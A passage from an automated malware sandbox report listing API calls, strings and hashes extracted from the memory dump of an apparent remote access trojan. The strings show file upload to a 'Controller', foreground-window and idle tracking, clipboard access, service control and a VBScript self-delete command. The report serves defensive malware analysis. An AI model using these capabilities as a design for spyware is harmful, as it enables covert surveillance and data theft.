                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                  • CloseHandle.KERNEL32(00000000), ref: 00408F64
                  • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                  • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                  • API String ID: 3086580692-2582957567
                  • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                  • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                  • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                  • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                  APIs
                  • Sleep.KERNEL32(00001388), ref: 0040A740
                    • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                    • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                    • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                    • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                  • API String ID: 3795512280-1152054767
                  • Opcode ID: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                  • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                  • Opcode Fuzzy Hash: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                  • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                  APIs
                  • connect.WS2_32(?,?,?), ref: 004048E0
                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                  • WSAGetLastError.WS2_32 ref: 00404A21
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                  • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                  • API String ID: 994465650-3229884001
                  • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                  • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                  • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                  • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 0045130A
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                    • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                    • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                    • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                  • _free.LIBCMT ref: 004512FF
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00451321
                  • _free.LIBCMT ref: 00451336
                  • _free.LIBCMT ref: 00451341
                  • _free.LIBCMT ref: 00451363
                  • _free.LIBCMT ref: 00451376
                  • _free.LIBCMT ref: 00451384
                  • _free.LIBCMT ref: 0045138F
                  • _free.LIBCMT ref: 004513C7
                  • _free.LIBCMT ref: 004513CE
                  • _free.LIBCMT ref: 004513EB
                  • _free.LIBCMT ref: 00451403
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                  • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                  • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                  APIs
                  • __EH_prolog.LIBCMT ref: 00419FB9
                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                  • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                  • GetLocalTime.KERNEL32(?), ref: 0041A105
                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                  • API String ID: 489098229-1431523004
                  • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                  • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                  • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                  • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                  APIs
                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                    • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00413714
                    • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32 ref: 0041372D
                    • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                  • ExitProcess.KERNEL32 ref: 0040D9C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                  • API String ID: 1913171305-3159800282
                  • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                  • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                  • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                  • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                  • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                  • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                  • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                  APIs
                    • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                  • GetLastError.KERNEL32 ref: 00455CEF
                  • __dosmaperr.LIBCMT ref: 00455CF6
                  • GetFileType.KERNEL32 ref: 00455D02
                  • GetLastError.KERNEL32 ref: 00455D0C
                  • __dosmaperr.LIBCMT ref: 00455D15
                  • CloseHandle.KERNEL32(00000000), ref: 00455D35
                  • CloseHandle.KERNEL32(?), ref: 00455E7F
                  • GetLastError.KERNEL32 ref: 00455EB1
                  • __dosmaperr.LIBCMT ref: 00455EB8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                  • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                  • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                  • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                  APIs
                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                  • __alloca_probe_16.LIBCMT ref: 00453EEA
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                  • __alloca_probe_16.LIBCMT ref: 00453F94
                  • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                  • __freea.LIBCMT ref: 00454003
                  • __freea.LIBCMT ref: 0045400F
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                  • String ID: \@E
                  • API String ID: 201697637-1814623452
                  • Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                  • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                  • Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
                  • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID: \&G$\&G$`&G
                  • API String ID: 269201875-253610517
                  • Opcode ID: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                  • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                  • Opcode Fuzzy Hash: 753e5f9e072138fb6cd7009167dc0b4a762ab6b47e26c8bd7c62549e421885b3
                  • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 65535$udp
                  • API String ID: 0-1267037602
                  • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                  • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                  • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                  • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 0040AD38
                  • Sleep.KERNEL32(000001F4), ref: 0040AD43
                  • GetForegroundWindow.USER32 ref: 0040AD49
                  • GetWindowTextLengthW.USER32 ref: 0040AD52
                  • GetWindowTextW.USER32 ref: 0040AD86
                  • Sleep.KERNEL32(000003E8), ref: 0040AE54
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                  • String ID: [${ User has been idle for $ minutes }$]
                  • API String ID: 911427763-3954389425
                  • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                  • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                  • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                  • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LongNamePath
                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                  • API String ID: 82841172-425784914
                  • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                  • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                  • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                  • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                  • __dosmaperr.LIBCMT ref: 0043A8A6
                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                  • __dosmaperr.LIBCMT ref: 0043A8E3
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                  • __dosmaperr.LIBCMT ref: 0043A937
                  • _free.LIBCMT ref: 0043A943
                  • _free.LIBCMT ref: 0043A94A
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                  • String ID:
                  • API String ID: 2441525078-0
                  • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                  • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                  • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                  • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                  APIs
                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                  • GetMessageA.USER32 ref: 0040556F
                  • TranslateMessage.USER32(?), ref: 0040557E
                  • DispatchMessageA.USER32 ref: 00405589
                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                  • String ID: CloseChat$DisplayMessage$GetMessage
                  • API String ID: 2956720200-749203953
                  • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                  • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                  • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                  • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                  APIs
                    • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                  • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                  • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                  • String ID: 0VG$0VG$<$@$Temp
                  • API String ID: 1704390241-2575729100
                  • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                  • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                  • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                  • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                  APIs
                  • OpenClipboard.USER32 ref: 00416941
                  • EmptyClipboard.USER32 ref: 0041694F
                  • CloseClipboard.USER32 ref: 00416955
                  • OpenClipboard.USER32 ref: 0041695C
                  • GetClipboardData.USER32 ref: 0041696C
                  • GlobalLock.KERNEL32 ref: 00416975
                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                  • CloseClipboard.USER32 ref: 00416984
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                  • String ID: !D@
                  • API String ID: 2172192267-604454484
                  • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                  • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                  • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                  • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                  APIs
                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                  • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                  • CloseHandle.KERNEL32(00000000), ref: 0041345F
                  • CloseHandle.KERNEL32(?), ref: 00413465
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                  • String ID:
                  • API String ID: 297527592-0
                  • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                  • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                  • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                  • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                  • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                  • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                  • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                  APIs
                  • _free.LIBCMT ref: 00448135
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00448141
                  • _free.LIBCMT ref: 0044814C
                  • _free.LIBCMT ref: 00448157
                  • _free.LIBCMT ref: 00448162
                  • _free.LIBCMT ref: 0044816D
                  • _free.LIBCMT ref: 00448178
                  • _free.LIBCMT ref: 00448183
                  • _free.LIBCMT ref: 0044818E
                  • _free.LIBCMT ref: 0044819C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                  • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                  • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                  • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                  APIs
                  Strings
                  Memory Dump Source
